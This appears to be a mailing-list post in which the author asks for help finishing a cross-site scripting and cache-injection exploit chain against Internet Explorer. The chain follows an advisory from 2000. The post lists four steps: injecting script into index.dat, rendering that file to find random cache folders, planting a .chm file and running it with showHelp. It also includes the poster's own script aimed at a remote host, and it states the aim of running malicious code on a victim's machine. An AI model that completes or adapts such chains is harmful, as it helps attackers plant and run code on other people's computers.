Hi All,

I am testing Cross-Site Scripting to inject and run malicious code. I was
following Georgi Guninski's advisory, which was published on 23 November
2000.

Following this advisory, I am trying to inject some malicious file at the victim's
machine & then to run that injected file.

According to this advisory, we have to perform the following four steps to inject
some file & run that file.

1) Inject JavaScript in "Index.dat" by
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
The JavaScript is executed in index.dat and has access to its content, which
allows one to find the random directory names.

2) Parse/render index.dat by:
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>

3) After the Temporary Internet Files folders are known, inject for example chm
files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>

4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

I am clear up to the second step he has specified, but I am not clear with the
third and fourth stages. The third stage is going to inject the chm1.chm file at
the victim's machine, but it is not clear whether this file is situated at the
victim's machine or the attacker's machine. Also, where will this file be stored at
the victim's machine? This step also doesn't use the names of the random directories
we have found in the 2nd step, so I don't know why the second step is required &
how we can write JavaScript to find the random folders from the "Index.dat" file.

The code for injecting JavaScript into Index.dat & displaying the content of the
index.dat file is given as:
<SCRIPT>
b=window.open("http://10.10.10.10?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
setTimeout("document.writeln(s)",10000);
</SCRIPT>

This code should return the output of the file index.dat into a new blank window,
but when I tried this I didn't get the output of the index.dat file in the new
window; instead I got the output of index.dat in the same window in which I had
written this code.

I think that to run the JavaScript stored in the index.dat file, first there is a
need to create an object that captures all the contents of the index.dat file, and
then we should create a new window & assign its "Inner HTML Code" to the contents
of the object created. I don't know whether it makes sense or not, but I am
trying to do something like that.

Any help on the above topics will be highly appreciated.

Thanking You,
Sincerely,

Indian Tiger, CISSP

